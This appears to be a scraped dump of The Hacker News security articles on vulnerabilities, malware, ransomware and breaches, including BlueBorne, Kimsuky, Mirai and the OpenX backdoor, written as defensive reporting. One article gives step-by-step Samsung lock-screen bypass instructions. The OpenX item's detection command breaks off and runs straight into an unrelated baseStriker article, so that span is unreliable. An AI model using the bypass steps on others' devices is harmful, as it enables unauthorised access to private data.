capabilities is extremely desireable to a hacker. BlueBorne can serve any malicious objective, such as cyber espionage, data theft, ransomware, and even creating large botnets out of IoT devices like the Mirai Botnet or mobile devices as with the recent WireX Botnet,"" Armis said. ""The BlueBorne attack vector surpasses the capabilities of most attack vectors by penetrating secure ""air-gapped"" networks which are disconnected from any other network, including the internet."" Apply Security Patches to Prevent Bluetooth Hacking The security firm responsibly disclosed the vulnerabilities to all the major affected companies a few months ago—including Google, Apple and Microsoft, Samsung and Linux Foundation. These vulnerabilities include: Information Leak Vulnerability in Android (CVE-2017-0785) Remote Code Execution Vulnerability (CVE-2017-0781) in Android's Bluetooth Network Encapsulation Protocol (BNEP) service Remote Code Execution Vulnerability (CVE-2017-0782) in Android BNEP's Personal Area Networking (PAN) profile The Bluetooth Pineapple in Android—Logical flaw (CVE-2017-0783) Linux kernel Remote Code Execution vulnerability (CVE-2017-1000251) Linux Bluetooth stack (BlueZ) information leak vulnerability (CVE-2017-1000250) The Bluetooth Pineapple in Windows—Logical flaw (CVE-2017-8628) Apple Low Energy Audio Protocol Remote Code Execution vulnerability (CVE Pending) Google and Microsoft have already made security patches available to their customers, while Apple iOS devices running the most recent version of its mobile operating system (that is 10.x) are safe. ""Microsoft released security updates in July and customers who have Windows Update enabled and applied the security updates, are protected automatically. We updated to protect customers as soon as possible, but as a responsible industry partner, we withheld disclosure until other vendors could develop and release updates."" – a Microsoft spokesperson said. What's worst? All iOS devices with 9.3.5 or older versions and over 1.1 Billion active Android devices running older than Marshmallow (6.x) are vulnerable to the BlueBorne attack. Moreover, millions of smart Bluetooth devices running a version of Linux are also vulnerable to the attack. Commercial and consumer-oriented Linux platform (Tizen OS), BlueZ and 3.3-rc1 are also vulnerable to at least one of the BlueBorne bugs. Android users need to wait for security patches for their devices, as it depends on your device manufacturers. In the meantime, they can install ""BlueBorne Vulnerability Scanner"" app (created by Armis team) from Google Play Store to check if their devices are vulnerable to BlueBorne attack or not. If found vulnerable, you are advised to turn off Bluetooth on your device when not in use. ",Vulnerability MySQL.com Once again Compromised using Sql Flaw,https://thehackernews.com/2011/12/mysqlcom-once-again-compromised-using.html,"MySQL.com Once again Compromised using Sql Flaw A hacker with name ""D35M0ND142"" claim to hack MySql.com website using Sql Injection Flaws. In September, Mysql.com was hacked and it was serving BlackHole exploit malware on the site. In a pastebin dump Hacker Exposes various Admin user credentials and Database info. The Compromised Usernames and Passwords are from Blog site of MySql. MySql website is pretty embarrassed for not securing its own database's properly, Even hacker share that ""Robin Schumacher is MySQL's Director of Product Management andhas over 20 years of database experience in DB2, MySQL, Oracle, SQLServer and other database engines. Before joining MySQL, Robin wasVice President of Product Management at Embarcadero Technologies."" Besides the hack on MySQL.com, D35M0ND142 also managed to breach the systems of the Urbino University in Italy and the Universal Language & Computer Institute in Nepal and Stream Database. ",Malware Researchers Unearth Links Between SunCrypt and QNAPCrypt Ransomware,https://thehackernews.com/2021/03/researchers-unearth-links-between.html,"SunCrypt, a ransomware strain that went on to infect several targets last year, may be an updated version of the QNAPCrypt ransomware, which targeted Linux-based file storage systems, according to new research. ""While the two ransomware [families] are operated by distinct different threat actors on the dark web, there are strong technical connections in code reuse and techniques, linking the two ransomware to the same author,"" Intezer Lab researcher Joakim Kennedy said in a malware analysis published today revealing the attackers' tactics on the dark web. First identified in July 2019, QNAPCrypt (or eCh0raix) is a ransomware family that was found to target Network Attached Storage (NAS) devices from Taiwanese companies QNAP Systems and Synology. The devices were compromised by brute-forcing weak credentials and exploiting known vulnerabilities with the goal of encrypting files found in the system. The ransomware has since been tracked to a Russian cybercrime group referred to as ""FullOfDeep,"" with Intezer shutting down as many as 15 ransomware campaigns using the QNAPCrypt variant with denial of service attacks targeting a list of static bitcoin wallets that were created for the express intent of accepting ransom payments from victims, and prevent future infections. SunCrypt, on the other hand, emerged as a Windows-based ransomware tool written originally in Go in October 2019, before it was ported to a C/C++ version in mid-2020. Besides stealing victims' data prior to encrypting the files and threatening with public disclosure, the group has leveraged distributed denial-of-service (DDoS) attacks as a secondary extortion tactic to pressure victims into paying the demanded ransom. Most recently, the ransomware was deployed to target a New South Wales-based medical diagnostics company called PRP Diagnostic Imaging on December 29, which involved the theft of ""a small volume of patient records"" from two of its administrative file servers. Although the two ransomware families have directed their attacks against different operating systems, reports of SunCrypt's connections to other ransomware groups have been previously speculated. Indeed, blockchain analysis company Chainalysis earlier last month quoted a ""privately circulated report"" from threat intelligence firm Intel 471 that claimed representatives from SunCrypt described their strain as a ""rewritten and rebranded version of a 'well-known' ransomware strain."" Now according to Intezer's analysis of the SunCrypt Go binaries, not only does the ransomware share similar encryption functions with QNAPCrypt, but also in the file types encrypted and the methods used to generate the encryption password as well as perform system locale checks to determine if the machine in question is located in a disallowed country. Also of note is the fact that both QNAPCrypt and SunCrypt make use of the ransomware-as-a-service (RaaS) model to advertise their tools on underground forums, wherein affiliates carry out the ransomware attacks themselves and pay a percentage of each victim's payment back to the strain's creators and administrators. Taking into account the overlaps and the behavioral differences between the two groups, Intezer suspects that ""the eCh0raix ransomware was transferred to and upgraded by the SunCrypt operators."" ""While the technical based evidence strongly provides a link between QNAPCrypt and the earlier version of SunCrypt, it is clear that both ransomware are operated by different individuals,"" the researchers concluded. ""Based on the available data, it is not possible to connect the activity between the two actors on the forum. This suggests that when new malware services derived from older services appear, they may not always be operated by the same people."" ",Malware "Kaspersky revealed ""Kimsuky"" Cyber Espionage campaign targeting South Korea",https://thehackernews.com/2013/09/Kimsuky-malware-Cyber-Espionage-campaign-South-Korea.html,"Russian Security Firm Kaspersky Lab has revealed that it has been following a sustained attack on South Korea by hackers seemingly based in North Korea., This new Cyber Espionage campaign dubbed ""Kimsuky"" has targeted several South Korean think tanks. Researchers believe the Kimsuky malware is most likely delivered via spear-phishing e-mails and used multiple Dropbox email accounts ""It's interesting that the drop box mail accounts iop110112@hotmail.com and rsh1213@hotmail.com are registered with the following ""kim"" names: kimsukyang and ""Kim asdfa"" The Kaspersky researchers revealed that the operation presents distinctive characteristics in its execution and logistics. The investigation started after the team of experts detected an unsophisticated spy program that communicated with it control server via a public e-mail server, an approach followed by too many amateur malware authors. Victims download a Trojan dropper which is used to download additional malware, which has the ability to perform the following espionage functions including keystroke logging, directory listing collection, remote control access and HWP document theft. The complete path found in the malware presents some Korean strings: D:\rsh\공격\UAC_dll(완성)\Release\test.pdb The ""rsh"" word, by all appearances, means a shortening of ""Remote Shell"" and the Korean words can be translated in English as ""attack"" and ""completion"", i.e.: D:\rsh\ATTACK\UAC_dll(COMPLETION)\Release\test.pdb At system startup, the basic library disables the system firewall and any firewall produced by the South Korean security product vendor AhnLab. The malware does not include a custom back door, instead the attackers modified a TeamViewer client as a remote control module. Bot agents communicate with C&C through the Bulgarian web-based free email server (mail.bg), it maintains a hard coded credentials for its e-mail account. After authenticating, the malware sends emails to another specified email address, and reads emails from the Inbox. Espionage campaign appears to be originated in North Korea. The researchers identified 10 IP addresses indicating that the attackers used networks in China's Jilin and Liaoning provinces, which border North Korea. Attackers were interested in targeting 11 organizations based in South Korea and two entities in China including the Sejong Institute, Korea Institute For Defense Analyses (KIDA), South Korea's Ministry of Unification, Hyundai Merchant Marine and The supporters of Korean Unification. ",Malware Samsung Galaxy Note II lock screen bypass vulnerability,https://thehackernews.com/2013/03/samsung-galaxy-note-ii-lock-screen.html,"iOS was in the news lately for a series of security mishaps, but this time android back in scene. A security flaw discovered by Terence Eden on the Galaxy Note II with Android 4.1.2 that allows hackers to briefly bypass the phone's lock screen without needing a password. By hitting ""emergency call"" then ""emergency contacts"" then holding the home button, the main home screen becomes visible for around a second just enough time to load an app, before reverting back to the lock screen. Not all apps will open in this manner, a demo video shows that Google Play does not respond. Reportedly, Eden contacted Samsung roughly five days ago but has yet to hear back. He said that he has not tested any other Samsung devices to see if they are also affected. The flaw appears to be similar to a screen lock vulnerability in newer Apple devices, including the iPhone 5. Steps to follow: Lock the device with a ""secure"" pattern, PIN, or password. Activate the screen. Press ""Emergency Call"". Press the ""ICE"" button on the bottom left. Hold down the physical home key for a few seconds and then release. The phone's home screen will be displayed - briefly. While the home screen is displayed, click on an app or a widget. The app or widget will launch. If the widget is ""direct dial"" the phone will start ringing. Using this method it could also be possible to load up email or SMS apps for long enough to get an overview of sensitive messages. ",Vulnerability MacKeeper Zero Day Remote Code Execution Vulnerability,https://thehackernews.com/2015/05/mackeeper-antivirus.html,"A controversial piece of security and maintenance software for Mac OS X computers, known as MacKeeper, has been found to be vulnerable to a critical remote code execution vulnerability. MacKeeper antivirus software for Mac OS X is designed to improve Mac performance and security, but it is infamous for its noisy ""clean up your Mac"" pop-under ads that stress the need for a system cleanup. If you try to close the ad, the software will prompt you to ""Leave Page/Stay on This Page"" dialogues. The vulnerability details were disclosed on Friday after the patch release, which allows an attacker to execute remotely malicious commands with root privileges on Mac OS X systems when a victim visits specially crafted Web pages. MacKeeper Versions Earlier to 3.4.1 are Affected The remote code execution flaw, affecting the versions earlier to 3.4.1, caused due to the way MacKeeper malware removal software handles its custom URLs, security researchers at SecureMac explained in an advisory. A remote attacker tricking the victim into visiting a maliciously crafted web page could exploit the flaw and execute arbitrary code with root privilege on the compromised system, with ""little to no user interaction"" required. Proof-of-Concept Exploit Released Security researcher Braden Thomas Posted reported the glitch last Thursday with a proof-of-concept (PoC) exploit that demonstrates the attack in action. The proof-of-concept exploit published by Thomas on Twitter takes advantage of a lack of input validation by MacKeeper and automatically executes a command to uninstall MacKeeper from the system when the victim lands on a malicious web page. ""If the user hasn't previously authenticated, they will be prompted to enter their username and password"" the advisory states, ""however the text that appears for the authentication dialogue can be manipulated as part of the exploit … so the user might not realise the consequences of this action."" Vulnerability Patched, Update Released At the moment SecureMac exposed the details of the glitch, the vulnerability was still zero-day, however since the developers of MacKeeper has released an update, MacKeeper Version 3.4.1, patching the custom URL scheme. MacKeeper malware removal software has been downloaded more than 20 Million times, which is an enormous number. Therefore in order to be safe, run MacKeeper Update Tracker and install the latest version of MacKeeper, version 3.4.1 or later. So far, it isn't clear that how this critical vulnerability potentially impacts many users, however, MacKeeper confirmed its users that the company is not aware of any security breach exploiting this vulnerability. ",Vulnerability GandCrab Ransomware Decryption Tool [All Versions] — Recover Files for Free,https://thehackernews.com/2019/06/gandcrab-ransomware-decryption-tool.html,"Cybersecurity researchers have released an updated version of GandCrab ransomware decryption tool that could allow millions of affected users to unlock their encrypted files for free without paying a ransom to the cybercriminals. GandCrab is one of the most prolific families of ransomware to date that has infected over 1.5 million computers since it first emerged in January 2018. Created by BitDefender, the new GandCrab decryption tool [download] can now unlock files encrypted by the latest versions of the ransomware, from 5.0 to 5.2, as well as for the older GandCrab ransomware versions. As part of the ""No More Ransom"" Project, BitDefender works in partnership with the FBI, Europol, London Police, and several other law enforcement agencies across the globe to help ransomware affected users. The cybersecurity company in recent months released ransomware removal tools for some older GandCrab versions that helped nearly 30,000 victims recover their data for free, saving roughly $50 million in unpaid ransoms. The GandCrab creators recently announced retirement of their Ransomware-as-a-Service (RaaS) operations that allowed criminal hackers affiliated with the organized crime extort more than a total of $2 billion from victims. ""While the number is clearly exaggerated, the GandCrab operation was prolific enough to score enough revenue to allow its masters to retire,"" researchers at BitDefender said. ""The shutdown will be followed by deletion of all keys, leaving the victims unable to retrieve the ransomed data even if they do pay a ransom."" ""Launched in January 2018, GandCrab quickly became the go-to tool for hackers for affiliate-based ransomware, holding a 50% share of all the ransomware market by mid-2018,"" the Europol explained. ""Set as a ransomware-as-a-service licensing model, distributors could buy the ransomware on dark web markets and spread it among their victims. In exchange, they would pay 40% of their profits to the GandCrab developers and keep 60% for themselves."" Most computer viruses make their way into your systems due to lack of simple security practices. Here below, we have listed some simple tips you should always follow to protect your computers against ransomware attacks: Beware of Phishing Emails — Always be suspicious of uninvited documents sent over an email and never click on links inside those documents unless verifying the source. Backup Regularly — To always have a tight grip on all your important files and documents, keep a good backup routine in place that makes their copies to an external storage device that is not always connected to your PC. Keep your Antivirus Software and System Up-to-Date — Always keep your antivirus software and systems updated to protect against the latest threats. ",Malware OpenX Advertising Network hacked and backdoor Injected,https://thehackernews.com/2013/08/OpenX-Advertising-Malware-backdoor-hacked-trojan.html,"OpenX, a leading provider of digital and mobile advertising technology has accordingly served backdoors that are injected into the Code and allows hackers to control over your Web server. German tech site the Heise notified Germany's computer emergency response team (CERT) this week about the OpenX Ad Server (2.8.10) backdoor, allowing an attacker to execute any PHP code via the ""eval"" function and could have provided attackers full access to their web sites. The OpenX team has confirmed the breach and OpenX senior application security engineer Nick Soracco said that two files in the binary distribution of 2.8.10 had been replaced with modified files that contained a remote code execution vulnerability. The attack code is written in PHP but is hidden in a JavaScript file that is part of a video player plugin (vastServeVideoPlayer) in the OpenX distribution. This vulnerability only applies to the free downloadable open source product, OpenX Source. It's important to note that all of OpenX's main suite of products, including OpenX Enterprise (ad serving), OpenX Market (exchange) and OpenX Lift (SSP) are not affected. Server administrators can find out if they are running the OpenX version that contains the backdoor by searching for PHP tags inside .js files. Researchers from Sucuri provide a simple command for this: $ grep -r --include ""*.js"" ' tag in the header of an HTML email—which is used to defines a default base URI, or URL, for relative links in a document or web page. In other words, if the URL is defined, then all subsequent relative links will use that URL as a starting point. As shown in the above screenshot, the researchers compared HTML code of a traditional phishing email with the one that uses a tag to split up the malicious link in a way that Safe Links fails to identify and replace the partial hyperlink, eventually redirecting victims to the phishing site, when clicked. Researchers have even provided a video demonstration, which shows the baseStriker attack in action. The researchers tested the baseStriker attack against several configurations and found that ""anyone using Office 365 in any configuration is vulnerable,"" be it web-based client, mobile app or desktop application of OutLook. Proofpoint is also found vulnerable to the baseStriker attack. However, Gmail users and those protecting their Office 365 with Mimecast are not impacted by this issue. So far, researchers have only seen hackers using the baseStriker attack to send phishing emails, but they believe the attack can be leveraged to distribute ransomware, malware and other malicious software. Avanan reported the issue to both Microsoft and Proofpoint earlier last weekend, but there is no patch available to fix the problem at the time of writing. ",Cyber_Attack Joomla Resources Directory (JRD) Portal Suffers Data Breach,https://thehackernews.com/2020/06/joomla-data-breach.html,"Joomla, one of the most popular Open-source content management systems (CMS), last week announced a new data breach impacting 2,700 users who have an account with its resources directory (JRD) website, i.e., resources.joomla.org. The breach exposed affected users' personal information, such as full names, business addresses, email addresses, phone numbers, and encrypted passwords. The company said the incident came to light during an internal website audit that revealed that a member of the Joomla Resources Directory (JRD) team stored a full unencrypted backup of the JRD website on an Amazon Web Services S3 bucket owned by the third-party company. The affected JRD portal lists developers and service providers specialized in Joomla, allowing registered users to extend their CMS with additional functionalities. Joomla said the investigation is still ongoing and that accesses to the website have been temporarily suspended. It has also reached out to the concerned third-party to get the data deleted. It's not clear if any party found the unencrypted backup and accessed the information. The details that could have been potentially accessed by an unauthorized third-party are as follows: Full names Business addresses Business email addresses Business phone numbers Company URLs Nature of business Encrypted passwords (hashed) IP addresses Newsletter subscription preferences The impact of the breach is said to be low, given that most of the information is already in the public domain. In addition to mandating a password reset for all impacted accounts, it's recommended to change them on other sites that reuse the same password to prevent credential stuffing attacks. As a consequence of the audit, Joomla has removed all users who've not logged in before January 1st, 2019, as well as several unused groups. Furthermore, it has enabled two-factor authentication and rolled out security fixes on its platform. ""Even if we don't have any evidence about data access, we highly recommend people who have an account on the Joomla Resources Directory and use the same password (or combination of an email address and password) on other services to immediately change their password for security reasons,"" Joomla said in the advisory. ",Data_Breaches Researchers to Share Details of Cyber-Terrorists Targeting Indian Government Officials,https://thehackernews.com/2015/08/hacker-cyber-terrorism.html,"The Potential threat, range from very narrow to very broad, posed by Cyber-Terrorism has provoked considerable alarm. Terrorists involved in Cyber Espionage and Operations aim at gaining access to Nation's critical infrastructure involving both Government as well as Private sectors. The Frequency and Intensity of such Cyber-attacks are increasing rapidly and extending into absolute cyber-war between states, allowing terrorist organizations to pilfer data from financial and military organizations. Similar Incident happened, few months back, when a group of Middle-east terrorists tried to infiltrate Indian Government officials operational in Cyber related divisions. In response, a team of Independent Indian security researchers planned a counter operation to track down the terrorist organization behind the cyber attack. Shesh Sarangdhar, a security researcher at Seclabs & Systems Pvt. told The Hacker News that his team successfully penetrated the source computer (using zero-day exploits) used for spreading malware to Government officials and found that the attacker's IP address belongs to Pakistan Telecommunication company limited. ""Upon Analysis, the infected system appeared be a part of an elaborately designed cyber operation center,"" Mr. Sarangdhar explained. Researchers found a directory called ""Umer Media"" on that compromised system, which contained Excel files maintaining a list of ""multiple social media profiles of terrorism bent."" ""Excel file elaborately maintained the details of individuals who comment and like on these pages. Many of these social media profiles were later analyzed and revealed some key players behind the cyber-terror organization,"" he told The Hacker News team. The goal of cyber counter operation conducted by the Indian researchers was to prevent cyber attacks against any and all critical infrastructures. Moreover, the researchers obtained mobile numbers of those key players and compromised their devices using a zero-day vulnerability in Maxthon browser. ""The mobile communication revealed that around 1000 mujahids were being trained to infiltrate Indian borders,"" Mr. Sarangdhar told us. Shesh Sarangdhar and his team will present the complete technical details of their operation, zero-day vulnerabilities used and the malware analysis at upcoming ""1337Con"" CyberSecurity Conference. ",Cyber_Attack Microsoft Kept Secret That Its Bug-Tracking Database Was Hacked In 2013,https://thehackernews.com/2017/10/microsoft-bug-tracking-breach.html,"It was not just Yahoo among ""Fortune 500"" companies who tried to keep a major data breach incident secret. Reportedly, Microsoft had also suffered a data breach four and a half years ago (in 2013), when a ""highly sophisticated hacking group"" breached its bug-reporting and patch-tracking database, but the hack was never made public until today. According to five former employees of the company, interviewed separately by Reuters, revealed that the breached database had been ""poorly protected with access possible via little more than a password."" This incident is believed to be the second known breach of such a corporate database after a critical zero-day vulnerability was discovered in Mozilla's Bugzilla bug-tracking software in 2014. As its name suggests, the bug-reporting and patch-tracking database for Windows contained information on critical and unpatched vulnerabilities in some of the most widely used software in the world, including Microsoft's own Windows operating system. The hack was believed to be carried out by a highly-skilled corporate espionage hacking group known by various names, including Morpho, Butterfly and Wild Neutron, who exploited a JAVA zero-day vulnerability to hack into Apple Mac computers of the Microsoft employees, ""and then move to company networks."" With such a database in hands, the so-called highly sophisticated hacking group could have developed zero-day exploits and other hacking tools to target systems worldwide. There's no better example than WannaCry ransomware attack to explain what a single zero-day vulnerability can do. ""Bad guys with inside access to that information would literally have a 'skeleton key' for hundreds of millions of computers around the world,"" said Eric Rosenbach, who was American deputy assistant secretary of defence for cyber at the time of the breach. When Microsoft discovered the compromised database in earlier 2013, an alarm spread inside the company. Following the concerns that hackers were using stolen vulnerabilities to conduct new attacks, the tech giant conducted a study to compare the timing of breaches with when the bugs had entered the database and when they were patched. Although the study found that the flaws in the stolen database were used in cyber attacks, Microsoft argued the hackers could have obtained the information elsewhere, and that there's ""no evidence that the stolen information had been used in those breaches."" Former employees also confirmed that the tech giant tightened up its security after the 2013 hacking incident and added multiple authentication layers to protect its bug-reporting system. However, three of the employees believes the study conducted by Microsoft did not rule out stolen vulnerabilities being used in future cyber attacks, and neither the tech giant conducted a thorough investigation into the incident. On being contacted, Microsoft declined to speak about the incident, beyond saying: ""Our security teams actively monitor cyber threats to help us prioritise and take appropriate action to keep customers protected."" ",Data_Breaches New Chrome 0-day Bug Under Active Attacks – Update Your Browser ASAP!,https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html,"Exactly a month after patching an actively exploited zero-day flaw in Chrome, Google today rolled out fixes for yet another zero-day vulnerability in the world's most popular web browser that it says is being abused in the wild. Chrome 89.0.4389.72, released by the search giant for Windows, Mac, and Linux on Tuesday, comes with a total of 47 security fixes, the most severe of which concerns an ""object lifecycle issue in audio."" Tracked as CVE-2021-21166, the security flaw is one of the two bugs reported last month by Alison Huffman of Microsoft Browser Vulnerability Research on February 11. A separate object lifecycle flaw, also identified in the audio component, was reported to Google on February 4, the same day the stable version of Chrome 88 became available. With no additional details, it's not immediately clear if the two security shortcomings are related. Google acknowledged that an exploit for the vulnerability exists in the wild but stopped short of sharing more specifics to allow a majority of users to install the fixes and prevent other threat actors from creating exploits targeting this zero-day. ""Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild,"" Chrome Technical Program Manager Prudhvikumar Bommana said. This is the second zero-day flaw in Chrome that Google has addressed since the start of the year. On February 4, the company issued a fix for an actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine. Additionally, Google last year resolved five Chrome zero-days that were actively exploited in the wild in a span of one month between October 20 and November 12. Chrome users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw. ",Vulnerability Source Code for IoT botnet responsible for World's largest DDoS Attack released Online,https://thehackernews.com/2016/10/mirai-source-code-iot-botnet.html,"With rapidly growing Internet of Thing (IoT) devices, they have become a much more attractive target for cybercriminals. Just recently we saw a record-breaking Distributed Denial of Service (DDoS) attacks against the France-based hosting provider OVH that reached over one Terabit per second (1 Tbps), which was carried out via a botnet of infected IoT devices. Now, such attacks are expected to grow more rapidly as someone has just released the source code for IoT botnet, which was 'apparently' used to carry out world's largest DDoS attacks. Internet of Things-Botnet 'Mirai' Released Online Dubbed Mirai, the malware is a DDoS Trojan that targets BusyBox systems, a collection of Unix utilities specifically designed for embedded devices like routers. The malware is programmed to hijack connected IoT devices that are using the default usernames and passwords set by the factory before devices are first shipped to customers. Spotted by Brian Krebs, the ""Mirai"" source code was released on Hackforums, a widely used hacker chat forum, on Friday. However, there is no concrete evidence that this is the same botnet malware that was used to conduct record-breaking DDoS attacks on Krebs' or OVH hosting website. Reportedly, the attack code has built-in scanners that look for vulnerable smart devices in homes and enroll them into a network of Botnet, that hackers and cyber criminals can then use in a DDoS attack to temporarily shut down any website. The hacker, nicknamed ""Anna-senpai,"" who released the Mirai source code said they have ""made their money...so it's time to GTFO."" ""So today, I have an amazing release for you,"" Anna-senpai wrote. ""With Mirai, I usually pull max 380k bots from telnet alone. However, after the Kreb [sic] DDoS, ISPs been slowly shutting down and cleaning up their act. Today, max pull is about 300k bots, and dropping."" Even after the above explanation, I am still wondering why the malware's author chose to dump the code online over making big money. Beware: Don't Download It Or Use at your own risk! I apologize, if you are looking for the download link. We came across hundreds of such malware and their source codes, but ethically we don't prefer to promote them through our articles because that could indirectly advantage more blackhat hackers to cause further damages. What if the source code contains any backdoor? It is not at all surprising to believe so, as we have seen several cases in past years, when hackers have taken advantage of trending or hot events (or incidents), in this case record-breaking DDoS attack, to post and distribute their backdoored malware strategically. Now that the malware is publicly released, anyone can download and use it to infect a large number of devices worldwide to create their own IoT botnet. And if the code contains any backdoor, it would not only compromise the user who downloads it from the hacking forum but also hijacks those who are part of that user's botnet network. So, we advise beginner and our enthusiast readers not to rush to download Mirai IoT Botnet files. Since manufacturers of IoT devices majorly focus on performance and usability and ignore security measures and encryption mechanisms, they are routinely being hacked and used as weapons in cyber attacks. Just recently we reported about vulnerable D-Link routers that are programmed in such a way that they contain several backdoors, which allow attackers to remotely hijack and control them, as well as network, leaving all connected devices vulnerable to cyber attacks. So, if you own one or more IoT devices, the first thing you need to do in order to protect yourself against cyber attacks is change those default credentials. ",Malware 125 New Flaws Found in Routers and NAS Devices from Popular Brands,https://thehackernews.com/2019/09/hacking-soho-routers.html,"The world of connected consumer electronics, IoT, and smart devices is growing faster than ever with tens of billions of connected devices streaming and sharing data wirelessly over the Internet, but how secure is it? As we connect everything from coffee maker to front-door locks and cars to the Internet, we're creating more potential—and possibly more dangerous—ways for hackers to wreak havoc. Believe me, there are over 100 ways a hacker can ruin your life just by compromising your wireless router—a device that controls the traffic between your local network and the Internet, threatening the security and privacy of a wide range of wireless devices, from computers and phones to IP Cameras, smart TVs and connected appliances. In its latest study titled ""SOHOpelessly Broken 2.0,"" Independent Security Evaluators (ISE) discovered a total of 125 different security vulnerabilities across 13 small office/home office (SOHO) routers and Network Attached Storage (NAS) devices, likely affecting millions. ""Today, we show that security controls put in place by device manufacturers are insufficient against attacks carried out by remote adversaries. This research project aimed to uncover and leverage new techniques to circumvent these new security controls in embedded devices,"" the researchers said. List of Affected Router Vendors SOHO routers and NAS devices tested by the researchers are from the following manufacturers: Buffalo Synology TerraMaster Zyxel Drobo ASUS and its subsidiary Asustor Seagate QNAP Lenovo Netgear Xiaomi Zioncom (TOTOLINK) According to the security researchers, all of these 13 widely-used devices they tested had at least one web application vulnerability that could allow a remote attacker to gain remote shell access or access to the administrative panel of the affected device. These vulnerabilities range from cross-site scripting (XSS), cross-site request forgery (CSRF), buffer overflow, operating system command injection (OS CMDi), authentication bypass, SQL injection (SQLi), and file upload path traversal vulnerabilities. Full Control Over Devices Without Authentication Researchers said they successfully obtained root shells on 12 of the devices, allowing them to have complete control over the affected devices, 6 of which contained flaws that would enable attackers to gain full control over a device remotely and without authentication. These affected business and home routers are Asustor AS-602T, Buffalo TeraStation TS5600D1206, TerraMaster F2-420, Drobo 5N2, Netgear Nighthawk R9000, and TOTOLINK A3002RU. This new report, SOHOpelessly Broken 2.0, is a follow-up study, SOHOpelessly Broken 1.0, published by the ISE security firm in 2013, when they disclosed a total of 52 vulnerabilities in 13 SOHO routers and NAS devices from vendors including TP-Link, ASUS, and Linksys. Since SOHOpelessly Broken 1.0, researchers said they found a few newer IoT devices implementing some useful security mechanisms in place, like address-space layout randomization (ASLR), functionalities that hinder reverse engineering, and integrity verification mechanisms for HTTP requests. However, some things have not changed since SOHOpelessly Broken 1.0, like many IoT devices still lack basic web application protection features, like anti-CSRF tokens and browser security headers, which can greatly enhance the security posture of web applications and the underlying systems they interact with. ISE researchers responsibly reported all of the vulnerabilities they discovered to affected device manufacturers, most of which promptly responded and already took security measures to mitigate these vulnerabilities, which have already received CVE Ids. However, some device manufacturers, including Drobo, Buffalo Americas, and Zioncom Holdings, did not respond to the researchers' findings. ",Vulnerability 3 Popular Drupal Modules Found Vulnerable — Patch Released,https://thehackernews.com/2016/07/drupal-security-update_14.html,"Just yesterday, I wrote a warning article announcing that Drupal – the popular open source content management system – will release patches for several highly critical Remote Code Execution (RCE) bugs that could allow attackers to fully take over any affected site. Below are the three separate Drupal modules that affect up to 10,000 websites: 1. RESTful Web Services – a popular module used for creating REST APIs, which is currently installed on at least 5,804 websites. The vulnerability in RESTWS alters the default page callbacks for entities to provide additional functionality, allowing attackers to ""send specially crafted requests resulting in arbitrary PHP execution."" Since anonymous users can exploit this vulnerability and there isn't any mitigating factor, users are advised to patch their websites as soon as possible. Admins using RESTful Web Services versions 7.x-2.x prior to 7.x-2.6 and versions 7.x-1.x prior to 7.x-1.7 for their Drupal websites are affected and are advised to upgrade to the latest RESTful Web Services releases. 2. Coder – a module used for code analysis, which is currently installed on at least 4,951 sites. The vulnerability exists in the Coder module that does not properly validate user inputs in a script file that has the PHP extension, allowing a malicious unauthorized user to make requests directly to this file to execute arbitrary code. To exploit the vulnerability, the Coder module does not even need to be enabled. The presence of the module on the file system and being reachable from the Web are enough for an attacker to exploit this flaw. Coder module versions 7.x-1.x prior to 7.x-1.3 and versions 7.x-2.x prior to 7.x-2.6 are affected. Admins using the Coder module for Drupal 7.x should upgrade to the latest releases. 3. Webform Multiple File Upload – a module used for collecting files from site visitors, which is currently installed on at least 3,076 sites. The Webform Multiple File Upload module contains a Remote Code Execution flaw that could allow an attacker to take over any affected site entirely using some specially crafted requests. Any site visitor could potentially exploit this vulnerability to take several malicious actions on the website, including completely taking over the website and server. This vulnerability exists in the Webform Multiple File Upload (webform_multifile) module versions 7.x-1.x and is fixed in the latest Webform Multiple File Upload version 7.x-1.4. ",Vulnerability Enable this New Setting to Secure your Computer from Macro-based Malware,https://thehackernews.com/2016/03/macro-malware-protection.html,"Do you deal with MS Word files on the daily basis? If yes, then are you aware that even opening a simple doc file could compromise your system? It is a matter to think that the virus does not directly affect you, but it is you who let the virus carry out the attack by enabling deadly ""Macros"" to view the doc contents that are generally on eye-catching subjects like bank invoice. How Macros are Crippling your System? The concept of Macros dates back to 1990s. You must be familiar with this message: ""Warning: This document contains macros."" A Macro is a series of commands and actions that help to automate some tasks. Microsoft Office programs support Macros written in Visual Basic for Applications (VBA), but they can also be used for malicious activities like installing malware. Hackers are cleverly using this technique on the shade of social engineering by sending the malicious Macros through doc file or spreadsheet with an eye-catching subject in the mail to the corporate networks. Once a user opens the malicious Word document, the doc file gets downloaded to its system. However, danger comes in when the user opens the file, and a popup window appears that states ""Enable Editing"" to view the content. Once the users click Enable Editing, the malicious file then begins to perform the notorious activities in the system such as to get embedded into other doc files to proliferate the attacking rate that results in crippling your system network. All those actions would depend upon payload program defines inside the Macro. Dridex and Locky are Warning Bells!!! No other incidents could get you the clear picture on the potential threat of Macro viruses apart from Dridex Malware and Locky Ransomware. Both malware had made use of the malicious Macros to hijack systems. Over 20 Million Euro had been stolen from the UK banks with the Dridex Malware, which got triggered via a nasty macro virus. The infectious bar of Locky ransomware had also seen an exponential growth in a couple of hours. How to Protect Yourself from Macro-based Malware? Step 1: Configure Trusted Location Since disabling Macros is not a feasible option, especially in an office environment where Macros are designed to simplify the complex task with automation. So, if your organization relies on Macros, you can move files that use Macros into the company's DMZ (Demilitarized Zone), also called Trusted Location. To configure the trusted location, you can navigate via: User Configuration/Administrative Templates/Microsoft Office XXX 20XX/Application Settings/Security/Trust Center/Trusted Locations Once configured, the Macros that does not belong to the trusted location would not run in any way, beefing up your system's security. Step 2: Block Macros in Office Files that came from the Internet Microsoft had recently unveiled a novel method by implementing a new tactical security feature to limit the Macro execution attack in MS Office 2016, ultimately preventing your system from hijacking. The new feature is a group policy setting that lets enterprise administrators to disable macros from running in Office files that come from the Internet. The new setting is called, ""Block macros from running in Office files from the Internet"" and can be navigated through the group policy management editor under: User configuration > Administrative templates > Microsoft Word 2016 > Word Options > Security > Trust Center It can be configured for each Office application. By enabling this option, macros that come from the Internet are blocked from running even if you have 'enable all macros' in the Macros Settings. Moreover, instead of having the option to 'Enable Editing,' you'll receive a notification that macros are blocked from running, as the document comes from an Untrusted Source. The only way to run that particular 